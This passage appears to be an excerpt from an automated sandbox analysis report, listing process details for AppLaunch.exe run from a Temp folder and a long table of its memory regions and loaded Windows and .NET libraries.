"\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe\"" cur_dir = "C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2328 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2329 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2330 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2331 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 2332 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 2333 start_va = 0xf0000 end_va = 0x12ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 2334 start_va = 0x290000 end_va = 0x38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 2335 start_va = 0x10c0000 end_va = 0x10d8fff monitored = 0 entry_point = 0x10cfb00 region_type = mapped_file name = "applaunch.exe" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\applaunch.exe") Region: id = 2336 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2337 start_va = 0x779e0000 end_va = 0x77b5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2338 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 2339 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2340 start_va = 0xfffb0000 end_va = 0xfffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000fffb0000" filename = "" Region: id = 2341 start_va = 0xfffdb000 end_va = 0xfffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fffdb000" filename = "" Region: id = 2342 start_va = 0xfffde000 end_va = 0xfffdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fffde000" filename = "" Region: id = 2343 start_va = 0xfffdf000 end_va = 0xfffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fffdf000" filename = "" Region: id = 2344 start_va = 0xfffe0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fffe0000" filename = "" Region: id = 2346 start_va = 0x400000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2347 start_va = 0x510000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2348 start_va = 0x75250000 end_va = 0x75257fff monitored = 0 entry_point = 0x752520f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2349 start_va = 0x75260000 end_va = 0x752bbfff monitored = 0 entry_point = 0x7529f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2350 start_va = 0x752c0000 end_va = 0x752fefff monitored = 0 entry_point = 0x752ee088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2351 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2352 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2353 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2354 start_va = 0x776e0000 end_va = 0x777fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000776e0000" filename = "" Region: id = 2355 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2356 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 2357 start_va = 0x590000 end_va = 0x77ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 2358 start_va = 0x753b0000 end_va = 0x753f9fff monitored = 1 entry_point = 0x753b2e54 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll") Region: id = 2359 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2360 start_va = 0x76fe0000 end_va = 0x77026fff monitored = 0 entry_point = 0x76fe74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2361 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2362 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2363 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2364 start_va = 0x70000 end_va = 0xd6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2365 start_va = 0x130000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 2366 start_va = 0x780000 end_va = 0x90ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 2367 start_va = 0x7fff0000 end_va = 0x7fffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2368 start_va = 0x80000000 end_va = 0x8000ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000080000000" filename = "" Region: id = 2369 start_va = 0x76c20000 end_va = 0x76cbffff monitored = 0 entry_point = 0x76c349e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2370 start_va = 0x76cc0000 end_va = 0x76d6bfff monitored = 0 entry_point = 0x76cca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2371 start_va = 0x76900000 end_va = 0x76918fff monitored = 0 entry_point = 0x76904975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2372 start_va = 0x75bc0000 end_va = 0x75caffff monitored = 0 entry_point = 0x75bd0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2373 start_va = 0x75530000 end_va = 0x7558ffff monitored = 0 entry_point = 0x7554a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2374 start_va = 0x75520000 end_va = 0x7552bfff monitored = 0 entry_point = 0x755210e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2375 start_va = 0x910000 end_va = 0xa6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000910000" filename = "" Region: id = 2376 start_va = 0x75320000 end_va = 0x753acfff monitored = 1 entry_point = 0x75332860 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 2377 start_va = 0x73550000 end_va = 0x73552fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 2378 start_va = 0x771d0000 end_va = 0x77226fff monitored = 0 entry_point = 0x771e9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 2379 start_va = 0x77240000 end_va = 0x772cffff monitored = 0 entry_point = 0x77256343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2380 start_va = 0x773b0000 end_va = 0x774affff monitored = 0 entry_point = 0x773cb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2381 start_va = 0x75780000 end_va = 0x75789fff monitored = 0 entry_point = 0x757836a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 2382 start_va = 0x76ac0000 end_va = 0x76b5cfff monitored = 0 entry_point = 0x76af3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 2383 start_va = 0xa70000 end_va = 0xbf7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a70000" filename = "" Region: id = 2384 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2385 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2386 start_va = 0x76b90000 end_va = 0x76beffff monitored = 0 entry_point = 0x76ba158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2387 start_va = 0x774b0000 end_va = 0x7757bfff monitored = 0 entry_point = 0x774b168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2388 start_va = 0xc00000 end_va = 0xd80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c00000" filename = "" Region: id = 2389 start_va = 0x10e0000 end_va = 0x24dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010e0000" filename = "" Region: id = 2390 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2391 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2392 start_va = 0x74520000 end_va = 0x74528fff monitored = 0 entry_point = 0x74521220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 2393 start_va = 0x724e0000 end_va = 0x72c8efff monitored = 1 entry_point = 0x724fd0d0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 2394 start_va = 0x71d30000 end_va = 0x724defff monitored = 1 entry_point = 0x71d4d0d0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 2395 start_va = 0x724e0000 end_va = 0x72c8efff monitored = 1 entry_point = 0x724fd0d0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 2396 start_va = 0x75300000 end_va = 0x75313fff monitored = 0 entry_point = 0x7530ac00 region_type = mapped_file name = "vcruntime140_clr0400.dll" filename = "\\Windows\\SysWOW64\\vcruntime140_clr0400.dll" (normalized: "c:\\windows\\syswow64\\vcruntime140_clr0400.dll") Region: id = 2397 start_va = 0x72430000 end_va = 0x724dafff monitored = 0 entry_point = 0x724c5f20 region_type = mapped_file name = "ucrtbase_clr0400.dll" filename = "\\Windows\\SysWOW64\\ucrtbase_clr0400.dll" (normalized: "c:\\windows\\syswow64\\ucrtbase_clr0400.dll") Region: id = 2406 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 2407 start_va = 0x130000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 2408 start_va = 0x1d0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2409 start_va = 0x140000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 2410 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 2411 start_va = 0x160000 end_va = 0x16ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 2412 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 2413 start_va = 0x180000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 2414 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 2415 start_va = 0x1a0000 end_va = 0x1a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 2416 start_va = 0xd90000 end_va = 0xf9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d90000" filename = "" Region: id = 2417 start_va = 0xd90000 end_va = 0xf0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d90000" filename = "" Region: id = 2418 start_va = 0xf60000 end_va = 0xf9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f60000" filename = "" Region: id = 2419 start_va = 0x5f0000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 2420 start_va = 0x680000 end_va = 0x77ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 2421 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 2422 start_va = 0x8d0000 end_va = 0x90ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 2423 start_va = 0xfffd8000 end_va = 0xfffdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fffd8000" filename = "" Region: id = 2430 start_va = 0x1b0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 2431 start_va = 0x24e0000 end_va = 0x44dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024e0000" filename = "" Region: id = 2432 start_va = 0x1e0000 end_va = 0x27ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 2433 start_va = 0x9a0000 end_va = 0x9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 2434 start_va = 0xa60000 end_va = 0xa6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a60000" filename = "" Region: id = 2435 start_va = 0x4520000 end_va = 0x461ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004520000" filename = "" Region: id = 2436 start_va = 0xfffd5000 end_va = 0xfffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fffd5000" filename = "" Region: id = 2437 start_va = 0x590000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 2438 start_va = 0x4620000 end_va = 0x471ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004620000" filename = "" Region: id = 2439 start_va = 0xfffad000 end_va = 0xfffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fffad000" filename = "" Region: id = 2440 start_va = 0x4720000 end_va = 0x49eefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2441 start_va = 0x71020000 end_va = 0x7242afff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll") Region: id = 2442 start_va = 0x1b0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 2443 start_va = 0x76e80000 end_va = 0x76fdbfff monitored = 0 entry_point = 0x76ecba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2444 start_va = 0x1c0000 end_va = 0x1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2445 start_va = 0x75400000 end_va = 0x75402fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-xstate-l2-1-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-xstate-l2-1-0.dll") Region: id = 2446 start_va = 0x70f90000 end_va = 0x71018fff monitored = 1 entry_point = 0x70f91130 region_type = mapped_file name = "clrjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll") Region: id = 2447 start_va = 0x757f0000 end_va = 0x7587efff monitored = 0 entry_point = 0x757f3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 2448 start_va = 0x280000 end_va = 0x28ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 2449 start_va = 0x390000 end_va = 0x39ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 2450 start_va = 0x390000 end_va = 0x39ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 2451 start_va = 0x390000 end_va = 0x39ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 2452 start_va = 0x3a0000 end_va = 0x3affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 2453 start_va = 0x70530000 end_va = 0x70f84fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\2c3c912ea8f058f9d04c4650128feb3f\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\2c3c912ea8f058f9d04c4650128feb3f\\system.ni.dll") Region: id = 2454 start_va = 0x6fd10000 end_va = 0x70527fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\31fae3290fad30c31c98651462d22724\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\31fae3290fad30c31c98651462d22724\\system.core.ni.dll") Region: id = 2455 start_va = 0x6e900000 end_va = 0x6fd06fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.servicemodel.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.ServiceModel\\74d6cec37a30e1133f67258ce3ea5ea7\\System.ServiceModel.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.servicemodel\\74d6cec37a30e1133f67258ce3ea5ea7\\system.servicemodel.ni.dll") Region: id = 2460 start_va = 0x6e5f0000 end_va = 0x6e8f4fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.identitymodel.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.IdentityModel\\c2ef5bc545b98a289f02d0b3eddbe280\\System.IdentityModel.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.identitymodel\\c2ef5bc545b98a289f02d0b3eddbe280\\system.identitymodel.ni.dll") Region: id = 2461 start_va = 0x6e310000 end_va = 0x6e5e2fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.runtime.serialization.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Runteb92aa12#\\274e43040c8a7a02ef1065db3283005a\\System.Runtime.Serialization.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.runteb92aa12#\\274e43040c8a7a02ef1065db3283005a\\system.runtime.serialization.ni.dll") Region: id = 2462 start_va = 0x49f0000 end_va = 0x4b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049f0000" filename = "" Region: id = 2463 start_va = 0x6e2f0000 end_va = 0x6e30ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "smdiagnostics.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\SMDiagnostics\\dc67dcb4b2fb4a3853d458cab08561f0\\SMDiagnostics.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\smdiagnostics\\dc67dcb4b2fb4a3853d458cab08561f0\\smdiagnostics.ni.dll") Region: id = 2464 start_va = 0x6db70000 end_va = 0x6e2e3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.xml.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\15af16d373cf0528cb74fc73d365fdbf\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\15af16d373cf0528cb74fc73d365fdbf\\system.xml.ni.dll") Region: id = 2465 start_va = 0x6daa0000 end_va = 0x6db6bfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.servicemodel.internals.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Servd1dec626#\\7679b916bf64989f7e8559969b308da1\\System.ServiceModel.Internals.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.servd1dec626#\\7679b916bf64989f7e8559969b308da1\\system.servicemodel.internals.ni.dll") Region: id = 2466 start_va = 0x742b0000 end_va = 0x742c6fff monitored = 0 entry_point = 0x742b3573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 2467 start_va = 0x390000 end_va = 0x3cbfff monitored = 0 entry_point = 0x39128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2468 start_va = 0x390000 end_va = 0x3cbfff monitored = 0 entry_point = 0x39128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2469 start_va = 0x390000 end_va = 0x3cbfff monitored = 0 entry_point = 0x39128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2470 start_va = 0x390000 end_va = 0x3cbfff monitored = 0 entry_point = 0x39128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2471 start_va = 0x390000 end_va = 0x3cbfff monitored = 0 entry_point = 0x39128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2472 start_va = 0x74270000 end_va = 0x742aafff monitored = 0 entry_point = 0x7427128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2473 start_va = 0x6da80000 end_va = 0x6da92fff monitored = 1 entry_point = 0x6da8d900 region_type = mapped_file name = "nlssorting.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\nlssorting.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\nlssorting.dll") Region: id = 2474 start_va = 0x4b80000 end_va = 0x4e51fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nlp" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\sortdefault.nlp" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\sortdefault.nlp") Region: id = 2475 start_va = 0x6d970000 end_va = 0x6da74fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.configuration.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\96f7edb07b12303f0ec2595c7f3778c7\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\96f7edb07b12303f0ec2595c7f3778c7\\system.configuration.ni.dll") Region: id = 2476 start_va = 0x75cb0000 end_va = 0x768f9fff monitored = 0 entry_point = 0x75d31601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 2477 start_va = 0x390000 end_va = 0x390fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 2478 start_va = 0x745e0000 end_va = 0x745eafff monitored = 0 entry_point = 0x745e1992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 2479 